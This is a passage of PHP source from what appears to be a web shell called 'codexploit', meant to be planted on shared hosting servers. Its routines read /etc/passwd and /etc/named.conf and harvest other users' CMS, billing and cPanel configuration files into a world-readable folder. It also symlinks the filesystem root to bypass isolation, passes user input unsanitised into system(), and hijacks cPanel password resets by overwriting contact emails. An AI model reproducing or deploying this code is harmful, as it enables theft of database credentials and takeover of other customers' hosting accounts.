892. $con = mkdir("codexploit_configs", 0777);
893. $isi_htc = "Options all\nRequire None\nSatisfy Any";
894. $htc = fopen("codexploit_configs/.htaccess","w");
895. fwrite($htc, $isi_htc);
896. while($passwd = fgets($etc)) {
897. if($passwd == "" || !$etc) {
898. echo "<font color=red>Can't read /etc/passwd</font>";
899. } else {
900. preg_match_all('/(.*?):x:/', $passwd, $user_config);
901. foreach($user_config[1] as $user_con) {
902. $user_config_dir = "/home/$user_con/public_html/";
903. if(is_readable($user_config_dir)) {
904. $grab_config =
905. [
906. "/home/$user_con/.my.cnf" => "cpanel",
907. "/home/$user_con/public_html/config/koneksi.php" => "Lokomedia",
908. "/home/$user_con/public_html/forum/config.php" => "phpBB",
909. "/home/$user_con/public_html/sites/default/settings.php" => "Drupal",
910. "/home/$user_con/public_html/config/settings.inc.php" => "PrestaShop",
911. "/home/$user_con/public_html/app/etc/local.xml" => "Magento",
912. "/home/$user_con/public_html/admin/config.php" => "OpenCart",
913. "/home/$user_con/public_html/application/config/database.php" => "Ellislab",
914. "/home/$user_con/public_html/vb/includes/config.php" => "Vbulletin",
915. "/home/$user_con/public_html/includes/config.php" => "Vbulletin",
916. "/home/$user_con/public_html/forum/includes/config.php" => "Vbulletin",
917. "/home/$user_con/public_html/forums/includes/config.php" => "Vbulletin",
918. "/home/$user_con/public_html/cc/includes/config.php" => "Vbulletin",
919. "/home/$user_con/public_html/inc/config.php" => "MyBB",
920. "/home/$user_con/public_html/includes/configure.php" => "OsCommerce",
921. "/home/$user_con/public_html/shop/includes/configure.php" => "OsCommerce",
922. "/home/$user_con/public_html/os/includes/configure.php" => "OsCommerce",
923. "/home/$user_con/public_html/oscom/includes/configure.php" => "OsCommerce",
924. "/home/$user_con/public_html/products/includes/configure.php" => "OsCommerce",
925. "/home/$user_con/public_html/cart/includes/configure.php" => "OsCommerce",
926. "/home/$user_con/public_html/inc/conf_global.php" => "IPB",
927. "/home/$user_con/public_html/wp-config.php" => "Wordpress",
928. "/home/$user_con/public_html/wp/test/wp-config.php" => "Wordpress",
929. "/home/$user_con/public_html/blog/wp-config.php" => "Wordpress",
930. "/home/$user_con/public_html/beta/wp-config.php" => "Wordpress",
931. "/home/$user_con/public_html/portal/wp-config.php" => "Wordpress",
932. "/home/$user_con/public_html/site/wp-config.php" => "Wordpress",
933. "/home/$user_con/public_html/wp/wp-config.php" => "Wordpress",
934. "/home/$user_con/public_html/WP/wp-config.php" => "Wordpress",
935. "/home/$user_con/public_html/news/wp-config.php" => "Wordpress",
936. "/home/$user_con/public_html/wordpress/wp-config.php" => "Wordpress",
937. "/home/$user_con/public_html/test/wp-config.php" => "Wordpress",
938. "/home/$user_con/public_html/demo/wp-config.php" => "Wordpress",
939. "/home/$user_con/public_html/home/wp-config.php" => "Wordpress",
940. "/home/$user_con/public_html/v1/wp-config.php" => "Wordpress",
941. "/home/$user_con/public_html/v2/wp-config.php" => "Wordpress",
942. "/home/$user_con/public_html/press/wp-config.php" => "Wordpress",
943. "/home/$user_con/public_html/new/wp-config.php" => "Wordpress",
944. "/home/$user_con/public_html/blogs/wp-config.php" => "Wordpress",
945. "/home/$user_con/public_html/configuration.php" => "Joomla",
946. "/home/$user_con/public_html/blog/configuration.php" => "Joomla",
947. "/home/$user_con/public_html/submitticket.php" => "^WHMCS",
948. "/home/$user_con/public_html/cms/configuration.php" => "Joomla",
949. "/home/$user_con/public_html/beta/configuration.php" => "Joomla",
950. "/home/$user_con/public_html/portal/configuration.php" => "Joomla",
951. "/home/$user_con/public_html/site/configuration.php" => "Joomla",
952. "/home/$user_con/public_html/main/configuration.php" => "Joomla",
953. "/home/$user_con/public_html/home/configuration.php" => "Joomla",
954. "/home/$user_con/public_html/demo/configuration.php" => "Joomla",
955. "/home/$user_con/public_html/test/configuration.php" => "Joomla",
956. "/home/$user_con/public_html/v1/configuration.php" => "Joomla",
957. "/home/$user_con/public_html/v2/configuration.php" => "Joomla",
958. "/home/$user_con/public_html/joomla/configuration.php" => "Joomla",
959. "/home/$user_con/public_html/new/configuration.php" => "Joomla",
960. "/home/$user_con/public_html/WHMCS/submitticket.php" => "WHMCS",
961. "/home/$user_con/public_html/whmcs1/submitticket.php" => "WHMCS",
962. "/home/$user_con/public_html/Whmcs/submitticket.php" => "WHMCS",
963. "/home/$user_con/public_html/whmcs/submitticket.php" => "WHMCS",
964. "/home/$user_con/public_html/whmcs/submitticket.php" => "WHMCS",
965. "/home/$user_con/public_html/WHMC/submitticket.php" => "WHMCS",
966. "/home/$user_con/public_html/Whmc/submitticket.php" => "WHMCS",
967. "/home/$user_con/public_html/whmc/submitticket.php" => "WHMCS",
968. "/home/$user_con/public_html/WHM/submitticket.php" => "WHMCS",
969. "/home/$user_con/public_html/Whm/submitticket.php" => "WHMCS",
970. "/home/$user_con/public_html/whm/submitticket.php" => "WHMCS",
971. "/home/$user_con/public_html/HOST/submitticket.php" => "WHMCS",
972. "/home/$user_con/public_html/Host/submitticket.php" => "WHMCS",
973. "/home/$user_con/public_html/host/submitticket.php" => "WHMCS",
974. "/home/$user_con/public_html/SUPPORTES/submitticket.php" => "WHMCS",
975. "/home/$user_con/public_html/Supportes/submitticket.php" => "WHMCS",
976. "/home/$user_con/public_html/supportes/submitticket.php" => "WHMCS",
977. "/home/$user_con/public_html/domains/submitticket.php" => "WHMCS",
978. "/home/$user_con/public_html/domain/submitticket.php" => "WHMCS",
979. "/home/$user_con/public_html/Hosting/submitticket.php" => "WHMCS",
980. "/home/$user_con/public_html/HOSTING/submitticket.php" => "WHMCS",
981. "/home/$user_con/public_html/hosting/submitticket.php" => "WHMCS",
982. "/home/$user_con/public_html/CART/submitticket.php" => "WHMCS",
983. "/home/$user_con/public_html/Cart/submitticket.php" => "WHMCS",
984. "/home/$user_con/public_html/cart/submitticket.php" => "WHMCS",
985. "/home/$user_con/public_html/ORDER/submitticket.php" => "WHMCS",
986. "/home/$user_con/public_html/Order/submitticket.php" => "WHMCS",
987. "/home/$user_con/public_html/order/submitticket.php" => "WHMCS",
988. "/home/$user_con/public_html/CLIENT/submitticket.php" => "WHMCS",
989. "/home/$user_con/public_html/Client/submitticket.php" => "WHMCS",
990. "/home/$user_con/public_html/client/submitticket.php" => "WHMCS",
991. "/home/$user_con/public_html/CLIENTAREA/submitticket.php" => "WHMCS",
992. "/home/$user_con/public_html/Clientarea/submitticket.php" => "WHMCS",
993. "/home/$user_con/public_html/clientarea/submitticket.php" => "WHMCS",
994. "/home/$user_con/public_html/SUPPORT/submitticket.php" => "WHMCS",
995. "/home/$user_con/public_html/Support/submitticket.php" => "WHMCS",
996. "/home/$user_con/public_html/support/submitticket.php" => "WHMCS",
997. "/home/$user_con/public_html/BILLING/submitticket.php" => "WHMCS",
998. "/home/$user_con/public_html/Billing/submitticket.php" => "WHMCS",
999. "/home/$user_con/public_html/billing/submitticket.php" => "WHMCS",
1000. "/home/$user_con/public_html/BUY/submitticket.php" => "WHMCS",
1001. "/home/$user_con/public_html/Buy/submitticket.php" => "WHMCS",
1002. "/home/$user_con/public_html/buy/submitticket.php" => "WHMCS",
1003. "/home/$user_con/public_html/MANAGE/submitticket.php" => "WHMCS",
1004. "/home/$user_con/public_html/Manage/submitticket.php" => "WHMCS",
1005. "/home/$user_con/public_html/manage/submitticket.php" => "WHMCS",
1006. "/home/$user_con/public_html/CLIENTSUPPORT/submitticket.php" => "WHMCS",
1007. "/home/$user_con/public_html/ClientSupport/submitticket.php" => "WHMCS",
1008. "/home/$user_con/public_html/Clientsupport/submitticket.php" => "WHMCS",
1009. "/home/$user_con/public_html/clientsupport/submitticket.php" => "WHMCS",
1010. "/home/$user_con/public_html/CHECKOUT/submitticket.php" => "WHMCS",
1011. "/home/$user_con/public_html/Checkout/submitticket.php" => "WHMCS",
1012. "/home/$user_con/public_html/checkout/submitticket.php" => "WHMCS",
1013. "/home/$user_con/public_html/BILLINGS/submitticket.php" => "WHMCS",
1014. "/home/$user_con/public_html/Billings/submitticket.php" => "WHMCS",
1015. "/home/$user_con/public_html/billings/submitticket.php" => "WHMCS",
1016. "/home/$user_con/public_html/BASKET/submitticket.php" => "WHMCS",
1017. "/home/$user_con/public_html/Basket/submitticket.php" => "WHMCS",
1018. "/home/$user_con/public_html/basket/submitticket.php" => "WHMCS",
1019. "/home/$user_con/public_html/SECURE/submitticket.php" => "WHMCS",
1020. "/home/$user_con/public_html/Secure/submitticket.php" => "WHMCS",
1021. "/home/$user_con/public_html/secure/submitticket.php" => "WHMCS",
1022. "/home/$user_con/public_html/SALES/submitticket.php" => "WHMCS",
1023. "/home/$user_con/public_html/Sales/submitticket.php" => "WHMCS",
1024. "/home/$user_con/public_html/sales/submitticket.php" => "WHMCS",
1025. "/home/$user_con/public_html/BILL/submitticket.php" => "WHMCS",
1026. "/home/$user_con/public_html/Bill/submitticket.php" => "WHMCS",
1027. "/home/$user_con/public_html/bill/submitticket.php" => "WHMCS",
1028. "/home/$user_con/public_html/PURCHASE/submitticket.php" => "WHMCS",
1029. "/home/$user_con/public_html/Purchase/submitticket.php" => "WHMCS",
1030. "/home/$user_con/public_html/purchase/submitticket.php" => "WHMCS",
1031. "/home/$user_con/public_html/ACCOUNT/submitticket.php" => "WHMCS",
1032. "/home/$user_con/public_html/Account/submitticket.php" => "WHMCS",
1033. "/home/$user_con/public_html/account/submitticket.php" => "WHMCS",
1034. "/home/$user_con/public_html/USER/submitticket.php" => "WHMCS",
1035. "/home/$user_con/public_html/User/submitticket.php" => "WHMCS",
1036. "/home/$user_con/public_html/user/submitticket.php" => "WHMCS",
1037. "/home/$user_con/public_html/CLIENTS/submitticket.php" => "WHMCS",
1038. "/home/$user_con/public_html/Clients/submitticket.php" => "WHMCS",
1039. "/home/$user_con/public_html/clients/submitticket.php" => "WHMCS",
1040. "/home/$user_con/public_html/BILLINGS/submitticket.php" => "WHMCS",
1041. "/home/$user_con/public_html/Billings/submitticket.php" => "WHMCS",
1042. "/home/$user_con/public_html/billings/submitticket.php" => "WHMCS",
1043. "/home/$user_con/public_html/MY/submitticket.php" => "WHMCS",
1044. "/home/$user_con/public_html/My/submitticket.php" => "WHMCS",
1045. "/home/$user_con/public_html/my/submitticket.php" => "WHMCS",
1046. "/home/$user_con/public_html/secure/whm/submitticket.php" => "WHMCS",
1047. "/home/$user_con/public_html/secure/whmcs/submitticket.php" => "WHMCS",
1048. "/home/$user_con/public_html/panel/submitticket.php" => "WHMCS",
1049. "/home/$user_con/public_html/clientes/submitticket.php" => "WHMCS",
1050. "/home/$user_con/public_html/cliente/submitticket.php" => "WHMCS",
1051. "/home/$user_con/public_html/support/order/submitticket.php" => "WHMCS",
1052. "/home/$user_con/public_html/bb-config.php" => "BoxBilling",
1053. "/home/$user_con/public_html/boxbilling/bb-config.php" => "BoxBilling",
1054. "/home/$user_con/public_html/box/bb-config.php" => "BoxBilling",
1055. "/home/$user_con/public_html/host/bb-config.php" => "BoxBilling",
1056. "/home/$user_con/public_html/Host/bb-config.php" => "BoxBilling",
1057. "/home/$user_con/public_html/supportes/bb-config.php" => "BoxBilling",
1058. "/home/$user_con/public_html/support/bb-config.php" => "BoxBilling",
1059. "/home/$user_con/public_html/hosting/bb-config.php" => "BoxBilling",
1060. "/home/$user_con/public_html/cart/bb-config.php" => "BoxBilling",
1061. "/home/$user_con/public_html/order/bb-config.php" => "BoxBilling",
1062. "/home/$user_con/public_html/client/bb-config.php" => "BoxBilling",
1063. "/home/$user_con/public_html/clients/bb-config.php" => "BoxBilling",
1064. "/home/$user_con/public_html/cliente/bb-config.php" => "BoxBilling",
1065. "/home/$user_con/public_html/clientes/bb-config.php" => "BoxBilling",
1066. "/home/$user_con/public_html/billing/bb-config.php" => "BoxBilling",
1067. "/home/$user_con/public_html/billings/bb-config.php" => "BoxBilling",
1068. "/home/$user_con/public_html/my/bb-config.php" => "BoxBilling",
1069. "/home/$user_con/public_html/secure/bb-config.php" => "BoxBilling",
1070. "/home/$user_con/public_html/support/order/bb-config.php" => "BoxBilling",
1071. "/home/$user_con/public_html/includes/dist-configure.php" => "Zencart",
1072. "/home/$user_con/public_html/zencart/includes/dist-configure.php" => "Zencart",
1073. "/home/$user_con/public_html/products/includes/dist-configure.php" => "Zencart",
1074. "/home/$user_con/public_html/cart/includes/dist-configure.php" => "Zencart",
1075. "/home/$user_con/public_html/shop/includes/dist-configure.php" => "Zencart",
1076. "/home/$user_con/public_html/includes/iso4217.php" => "Hostbills",
1077. "/home/$user_con/public_html/hostbills/includes/iso4217.php" => "Hostbills",
1078. "/home/$user_con/public_html/host/includes/iso4217.php" => "Hostbills",
1079. "/home/$user_con/public_html/Host/includes/iso4217.php" => "Hostbills",
1080. "/home/$user_con/public_html/supportes/includes/iso4217.php" => "Hostbills",
1081. "/home/$user_con/public_html/support/includes/iso4217.php" => "Hostbills",
1082. "/home/$user_con/public_html/hosting/includes/iso4217.php" => "Hostbills",
1083. "/home/$user_con/public_html/cart/includes/iso4217.php" => "Hostbills",
1084. "/home/$user_con/public_html/order/includes/iso4217.php" => "Hostbills",
1085. "/home/$user_con/public_html/client/includes/iso4217.php" => "Hostbills",
1086. "/home/$user_con/public_html/clients/includes/iso4217.php" => "Hostbills",
1087. "/home/$user_con/public_html/cliente/includes/iso4217.php" => "Hostbills",
1088. "/home/$user_con/public_html/clientes/includes/iso4217.php" => "Hostbills",
1089. "/home/$user_con/public_html/billing/includes/iso4217.php" => "Hostbills",
1090. "/home/$user_con/public_html/billings/includes/iso4217.php" => "Hostbills",
1091. "/home/$user_con/public_html/my/includes/iso4217.php" => "Hostbills",
1092. "/home/$user_con/public_html/secure/includes/iso4217.php" => "Hostbills",
1093. "/home/$user_con/public_html/support/order/includes/iso4217.php" => "Hostbills"
1094. ];
1095. foreach($grab_config as $config => $nama_config) {
1096. $ambil_config = file_get_contents($config);
1097. if($ambil_config == '') {
1098. } else {
1099. $file_config = fopen("codexploit_configs/$user_con-$nama_config.txt","w");
1100. fputs($file_config,$ambil_config);
1101. }
1102. }
1103. }
1104. }
1105. }
1106. }
1107. echo "<center><a href='?dir=$path/codexploit_configs'><font color=lime>Done</font></a></center>";
1108. }
1109.  
1110. /*
1111. Adminer
1112. */
1113. if($_GET['aksi'] == 'adminer') {
1114. $full = str_replace($_SERVER['DOCUMENT_ROOT'], "", $path);
1115. function adminer($url, $isi) {
1116. $fp = fopen($isi, "w");
1117. $ch = curl_init();
1118. curl_setopt($ch, CURLOPT_URL, $url);
1119. curl_setopt($ch, CURLOPT_BINARYTRANSFER, true);
1120. curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
1121. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
1122. curl_setopt($ch, CURLOPT_FILE, $fp);
1123. return curl_exec($ch);
1124. curl_close($ch);
1125. fclose($fp);
1126. ob_flush();
1127. flush();
1128. }
1129. if(file_exists('adminer.php')) {
1130. echo "<center><a href='$full/adminer.php' target='_blank'>-> Silahkan Login Adminer <-</a></font></center><br/>";
1131. } else {
1132. if(adminer("https://www.adminer.org/static/download/4.2.4/adminer-4.2.4.php","adminer.php")) {
1133. echo "<center><a href='$full/adminer.php' target='_blank'>-> adminer login <-</a></font></center><br/>";
1134. } else {
1135. echo "<center><font color=red>gagal buat file adminer</font></center><br/>";
1136. }
1137. }
1138. exit;
1139. }
1140.  
1141.  
1142. /*
1143. Symlink
1144. */
1145. if($_GET['aksi'] == 'symlink') {
1146. if(!is_file('named.txt')){
1147. $d00m = @file("/etc/named.conf");
1148. }else{
1149. $d00m = @file("named.txt");
1150. }
1151. if(!$d00m) {
1152. die ("<center>
1153. [ <a href='?dir=$path&aksi=symread'>Bypass Read</a> ]
1154. [ <a href='?dir=$path&aksi=sym_404'>Symlink 404</a> ]
1155. [ <a href='?dir=$path&aksi=sym_bypas'>Bypass Symlink</a> ]
1156. <br/>
1157. <font color='red'>Gagal Membaca /etc/named.conf</font>
1158. <br/><br/></center>");
1159. }
1160. else{
1161. echo "<center>
1162. [ <a href='?dir=$path&aksi=symread'>Bypass Read</a> ]
1163. [ <a href='?dir=$path&aksi=sym_404'>Symlink 404</a> ]
1164. [ <a href='?dir=$path&aksi=sym_bypas'>Bypass Symlink</a> ]
1165. <div class='tmp'></center>
1166. <table align='center' width='100%'>
1167. <thead class='bg-info'>
1168. <th>Domains</th>
1169. <th>Users</th>
1170. <th>symlink </th>
1171. </thead>";
1172. foreach($d00m as $dom){
1173. if(eregi("zone",$dom)){
1174. preg_match_all('#zone "(.*)"#', $dom, $domsws);
1175. flush();
1176. if(strlen(trim($domsws[1][0])) > 2){
1177. $user = posix_getpwuid(@fileowner("/etc/valiases/".$domsws[1][0]));
1178. flush();
1179. $site = $user['name'] ;
1180. @symlink("/","sym/root");
1181. $site = $domsws[1][0];
1182. $ir = 'ir';
1183. $il = 'il';
1184. if (preg_match("/.^$ir/",$domsws[1][0]) or preg_match("/.^$il/",$domsws[1][0]) ) {
1185. $site = ".$domsws[1][0].";
1186. }
1187. echo "
1188. <tr>
1189. <td>
1190. <a target='_blank' href=http://www.".$domsws[1][0]."/>".$site." </a>
1191. </td>
1192. <td>
1193. ".$user['name']."
1194. </td>
1195. <td>
1196. <a href='sym/root/home/".$user['name']."/public_html' target='_blank'>Symlink</a>
1197. </td>
1198. </tr>";
1199. flush();
1200. flush();
1201. }
1202. }
1203. }
1204. echo "</table>
1205. </div><br/>";
1206. }
1207. exit;
1208. }
1209.  
1210. if($_GET['aksi'] == 'symread') {
1211. echo "read /etc/named.conf";
1212. echo "<form method='post' action='?dir=$dir&aksi=symread&save=1'>
1213. <textarea class='form-control' rows='8' name='file'>";
1214. flush();
1215. flush();
1216. $file = '/etc/named.conf';
1217. $r3ad = @fopen($file, 'r');
1218. if ($r3ad){
1219. $content = @fread($r3ad, @filesize($file));
1220. echo "".htmlentities($content)."";
1221. }else if (!$r3ad) {
1222. $r3ad = @show_source($file) ;
1223. }else if (!$r3ad) {
1224. $r3ad = @highlight_file($file);
1225. }else if (!$r3ad) {
1226. $sm = @symlink($file,'sym.txt');
1227. if ($sm){
1228. $r3ad = @fopen('sym/sym.txt', 'r');
1229. $content = @fread($r3ad, @filesize($file));
1230. echo "".htmlentities($content)."";
1231. }
1232. }
1233. echo "</textarea><br/><input type='submit' class='btn btn-danger form-control' value='Save'/> </form>";
1234. if(isset($_GET['save'])){
1235. $cont = stripcslashes($_POST['file']);
1236. $f = fopen('named.txt','w');
1237. $w = fwrite($f,$cont);
1238. if($w){
1239. echo '<br/>save has been successfully';
1240. }
1241. fclose($f);
1242. }
1243. exit;
1244. }
1245.  
1246. if ($_GET['aksi'] == 'sym_404'){
1247. echo '<h2>Symlink 404</h2>
1248. <form method="post">
1249. File Target: <input type="text" class="form-control" name="dir" value="/home/user/public_html/wp-config.php"><br>
1250. Save As: <input type="text" class="form-control" name="isi" placeholder="[Ex] file.txt"/><br/>
1251. <input type="submit" class="btn btn-danger btn-block" value="Execute" name="execute"/>
1252. </form>';
1253. if($_POST['execute']){
1254. rmdir("xploit404");
1255. mkdir("xploit404", 0777);
1256. $dir = $_POST['dir'];
1257. $isi = $_POST['isi'];
1258. system("ln -s ".$dir."xploit404/".$isi);
1259. symlink($dir,"xploit404/".$isi);
1260. $inija = fopen("xploit404/.htaccess", "w");
1261. fwrite($inija,"ReadmeName ".$isi."\nOptions Indexes FollowSymLinks\nDirectoryIndex ids.html\nAddType text/plain .php\nAddHandler text/plain .php\nSatisfy Any");
1262. echo'<a href="/xploit404/" target="_blank"> >>Sukses<< </a>';
1263. }
1264. exit;
1265. }
1266.  
1267.  
1268. if ($_GET['aksi'] == 'sym_bypas'){
1269. if(isset($_GET['save']) and isset($_POST['file']) or @filesize('passwd.txt') > 0){
1270. $cont = stripcslashes($_POST['file']);
1271. if(!file_exists('passwd.txt')){
1272. $f = @fopen('passwd.txt','w');
1273. $w = @fwrite($f,$cont);
1274. fclose($f);
1275. }
1276. if($w or @filesize('passwd.txt') > 0){
1277. echo "<div class='tmp'>
1278. <table width='100%'>
1279. <thead class='bg-info'>
1280. <th>Users</th>
1281. <th>symlink</th>
1282. <th>FTP</th>
1283. </thead>";
1284. flush();
1285. $fil3 = file('passwd.txt');
1286. foreach ($fil3 as $f){
1287. $u=explode(':', $f);
1288. $user = $u['0'];
1289. echo "<tr>
1290. <td class='left'>$user</td>
1291. <td>
1292. <a href='sym/root/home/$user/public_html' target='_blank'>Symlink </a>
1293. </td>
1294. <td>
1295. <a href='$pageFTP/sym/root/home/$user/public_html' target='_blank'>FTP</a>
1296. </td>
1297. </tr>";
1298. flush();
1299. flush();
1300. }
1301. die ("</tr></table></div>");
1302. }
1303.  
1304. }
1305.  
1306. echo "read /etc/passwd";
1307. echo "<br/><form method='post' action='?dir=$dir&aksi=sym_bypas&save=1'>
1308. <textarea class='form-control' rows='8' name='file'>";
1309. flush();
1310. $file = '/etc/passwd';
1311. $r3ad = @fopen($file, 'r');
1312. if ($r3ad){
1313. $content = @fread($r3ad, @filesize($file));
1314. echo "".htmlentities($content)."";
1315. }elseif(!$r3ad) {
1316. $r3ad = @show_source($file) ;
1317. }elseif(!$r3ad) {
1318. $r3ad = @highlight_file($file);
1319. }elseif(!$r3ad) {
1320.  
1321. for($uid=0;$uid<1000;$uid++){
1322. $ara = posix_getpwuid($uid);
1323. if (!empty($ara)) {
1324. while (list ($key, $val) = each($ara)){
1325. print "$val:";
1326. }
1327. print "\n";
1328. }
1329. }
1330. }
1331. flush();
1332. echo "</textarea><br/>
1333. <input type='submit' class='btn btn-danger btn-block' value='Symlink'/><br/>
1334. </form>";
1335. flush();
1336. exit;
1337. }
1338.  
1339.  
1340. if ($_GET['aksi'] == 'CpanelReset') {
1341. echo '<br/><p class="text-center"><i class="fa fa-key"></i> Auto Reset Password Cpanel</p>
1342. <form method="POST">
1343. <div class="form-group">
1344. <input type="email" name="email" class="form-control" placeholder="Masukan Email..."/><br/>
1345. <input type="submit" name="submit" class="btn btn-danger btn-block" value="Send"/>
1346. </div>
1347. </form>';
1348.  
1349. if(isset($_POST['submit'])){
1350. $user = get_current_user();
1351. $site = $_SERVER['HTTP_HOST'];
1352. $ips = getenv('REMOTE_ADDR');
1353. $email = $_POST['email'];
1354. $wr = 'email:'.$email;
1355. $f = fopen('/home/'.$user.'/.cpanel/contactinfo', 'w');
1356. fwrite($f, $wr);
1357. fclose($f);
1358. $f = fopen('/home/'.$user.'/.contactinfo', 'w');
1359. fwrite($f, $wr);
1360. fclose($f);
1361. $parm = $site.':2082/resetpass?start=1';
1362. echo '<br/>Url: '.$parm.'';
1363. echo '<br/>Username: '.$user.'';
1364. echo '<br/>Success Reset To: '.$email.'<br/><br/>';
1365. }
1366. exit;
1367. }
1368.  
1369. if(isset($_GET['path'])){
1370. $path = $_GET['path'];
1371. chdir($path);
1372. }else{
1373. $path = getcwd();
1374. }
1375. $path = str_replace('\\','/',$path);
1376. $paths = explode('/',$path);
1377. echo "<br/>Lokasi Saat Ini => ";
1378. foreach($paths as $id=>$pat){
1379. if($pat == '' && $id == 0){
1380. $a = true;
1381. echo '<a href="?dir=/">/</a>';
1382. continue;
1383. }
1384. if($pat == '') continue;
1385. echo '<a href="?dir=';
1386. for($i=0;$i<=$id;$i++){
1387. echo "$paths[$i]";
1388. if($i != $id) echo "/";
1389. }
1390. echo '">'.$pat.'</a>/';
1391. }
1392. $scandir = scandir($path);
1393. echo "<hr>";
1394. echo '<div class="table-responsive-lg">
1395. <table class="table table-hover table-bordered text-white">
1396. <thead class="bg-warning text-dark text-center">
1397. <th scope="col">Nama</th>
1398. <th scope="col">Type</th>
1399. <th scope="col">Size</th>
1400. <th scope="col">Permission</th>
1401. <th scope="col">Action</th>
1402. </thead>';
1403.  
1404. foreach($scandir as $dir){
1405.  
1406. /* cek jika ini berbentuk folder */
1407. /* cek jika nama folder karaker terlalu panjang */
1408. if (strlen($dir) > 25) {
1409. $_dir = substr($dir, 0, 25)."...";
1410. }else{
1411. $_dir = $dir;
1412. }
1413. if(!is_dir($path.'/'.$file)) continue;
1414. $size = filesize($path.'/'.$file)/1024;
1415. $size = round($size,3);
1416.  
1417. if($size >= 1024){
1418. $size = round($size/1024,2).' MB';
1419. }else{
1420. $size = $size.' KB';
1421. }
1422. if(!is_dir($path.'/'.$dir) || $dir == '.' || $dir == '..') continue;
1423. echo
1424. '<tr>
1425. <td class="text-white">
1426. <img src="http://aux.iconspalace.com/uploads/folder-icon-256-1787672482.png" class="ico"></img> <a href="?dir='.$path.'/'.$dir.'">'.$_dir.'</a></td>
1427. <td class="text-center">Directory</td>
1428. <td class="text-white"><center>'.$size.'</center></td>
1429. <td class="text-white"><center>';
1430. if(is_writable($path.'/'.$dir)) echo '<font color="#00ff00">';
1431. elseif(!is_readable($path.'/'.$dir)) echo '<font color="red">';
1432. echo perms($path.'/'.$dir);
1433. if(is_writable($path.'/'.$dir) || !is_readable($path.'/'.$dir)) echo '</font></center></td>
1434. <td><center>
1435. <a title="Ubah Nama" class="badge" href="?dir='.$path.'/'.$dir.'&aksi=rename_folder">&nbsp;Ubah Nama</a>&nbsp;&nbsp;
1436. <a title="Delete" class="badge" href="?dir='.$path.'/'.$dir.'&aksi=hapus_folder">&nbsp;Hapus</a>
1437. </td>
1438. ';
1439. }
1440.  
1441. foreach($scandir as $file){
1442.  
1443.  
1444. if(!is_file($path.'/'.$file)) continue;
1445. $size = filesize($path.'/'.$file)/1024;
1446. $size = round($size,3);
1447.  
1448. if($size >= 1024){
1449. $size = round($size/1024,2).' MB';
1450. }else{
1451. $size = $size.' KB';
1452. }
1453.  
1454.  
1455. echo '<tr>
1456. <td><img src="';
1457. $ext = strtolower(pathinfo($file, PATHINFO_EXTENSION));
1458. if($ext == "php") {
1459. echo 'https://image.flaticon.com/icons/png/128/337/337947.png"';
1460. }elseif ($ext == "html") {
1461. echo 'https://image.flaticon.com/icons/png/128/136/136528.png"';
1462. }elseif ($ext == "css") {
1463. echo 'https://image.flaticon.com/icons/png/128/136/136527.png"';
1464. }elseif ($ext == "png") {
1465. echo 'https://image.flaticon.com/icons/png/128/136/136523.png"';
1466. }elseif ($ext == "jpg") {
1467. echo 'https://image.flaticon.com/icons/png/128/136/136524.png"';
1468. }elseif ($ext == "jpeg") {
1469. echo 'http://i.imgur.com/e8mkvPf.png"';
1470. }elseif($ext == "zip") {
1471. echo 'https://image.flaticon.com/icons/png/128/136/136544.png"';
1472. }elseif ($ext == "js") {
1473. echo 'https://image.flaticon.com/icons/png/128/1126/1126856.png';
1474. }elseif ($ext == "ttf") {
1475. echo 'https://image.flaticon.com/icons/png/128/1126/1126892.png';
1476. }elseif ($ext == "otf") {
1477. echo 'https://image.flaticon.com/icons/png/128/1126/1126891.png';
1478. }elseif ($ext == "txt") {
1479. echo 'https://image.flaticon.com/icons/png/128/136/136538.png';
1480. }elseif ($ext == "ico") {
1481. echo 'https://image.flaticon.com/icons/png/128/1126/1126873.png';
1482. }elseif ($ext == "conf") {
1483. echo 'https://image.flaticon.com/icons/png/512/1573/1573301.png';
1484. }elseif ($ext == "htaccess") {
1485. echo 'https://image.flaticon.com/icons/png/128/1720/1720444.png';
1486. }elseif ($ext == "sh") {
1487. echo 'https://image.flaticon.com/icons/png/128/617/617535.png';
1488. }elseif ($ext == "py") {
1489. echo 'https://image.flaticon.com/icons/png/128/180/180867.png';
1490. }elseif ($ext == "sql") {
1491. echo 'https://img.icons8.com/ultraviolet/2x/data-configuration.png';
1492. }elseif ($ext == "pl") {
1493. echo 'http://i.imgur.com/PnmX8H9.png';
1494. }elseif ($ext == "pdf") {
1495. echo 'https://image.flaticon.com/icons/png/128/136/136522.png';
1496. }elseif ($ext == "mp4") {
1497. echo 'https://image.flaticon.com/icons/png/128/136/136545.png';
1498. }elseif ($ext == "mp3") {
1499. echo 'https://image.flaticon.com/icons/png/128/136/136548.png';
1500. }elseif ($ext == "git") {
1501. echo 'https://image.flaticon.com/icons/png/128/617/617509.png';
1502. }elseif ($ext == "md") {
1503. echo 'https://image.flaticon.com/icons/png/128/617/617520.png';
1504. }else{
1505. echo 'http://icons.iconarchive.com/icons/zhoolego/material/256/Filetype-Docs-icon.png';
1506. }
1507. echo '" class="ico2"></img>';
1508.  
1509. if (strlen($file) > 25) {
1510. $_file = substr($file, 0, 25)."...-.".$ext;
1511. }else{
1512. $_file = $file;
1513. }
1514.  
1515. echo' <a href="?dir='.$path.'&aksi=view&dirf='.$path.'/'.$file.'">'.$_file.'</a></td>';
1516. echo '<td class="text-center">';
1517. $ext = strtolower(pathinfo($file, PATHINFO_EXTENSION));
1518.  
1519. if($ext == "php") {
1520. echo 'application/octet-stream';
1521. }elseif ($ext == "html") {
1522. echo 'text/html';
1523. }elseif ($ext == "css") {
1524. echo 'application/octet-stream';
1525. }elseif ($ext == "png") {
1526. echo 'image/png';
1527. }elseif ($ext == "jpg") {
1528. echo 'image/jpg';
1529. }elseif ($ext == "jpeg") {
1530. echo 'image/jpeg';
1531. }elseif($ext == "zip") {
1532. echo 'dokumen/zip';
1533. }elseif ($ext == "js") {
1534. echo 'text/js';
1535. }elseif ($ext == "ttf") {
1536. echo 'application/octet-stream';
1537. }elseif ($ext == "otf") {
1538. echo 'application/octet-stream';
1539. }elseif ($ext == "txt") {
1540. echo 'text/txt';
1541. }elseif ($ext == "ico") {
1542. echo 'application/octet-stream';
1543. }elseif ($ext == "conf") {
1544. echo 'application/octet-stream';
1545. }elseif ($ext == "htaccess") {
1546. echo 'application/octet-stream';
1547. }elseif ($ext == "sh") {
1548. echo 'application/octet-stream';
1549. }elseif ($ext == "py") {
1550. echo 'application/octet-stream';
1551. }elseif ($ext == "sql") {
1552. echo 'application/octet-stream';
1553. }elseif ($ext == "pl") {
1554. echo 'application/octet-stream';
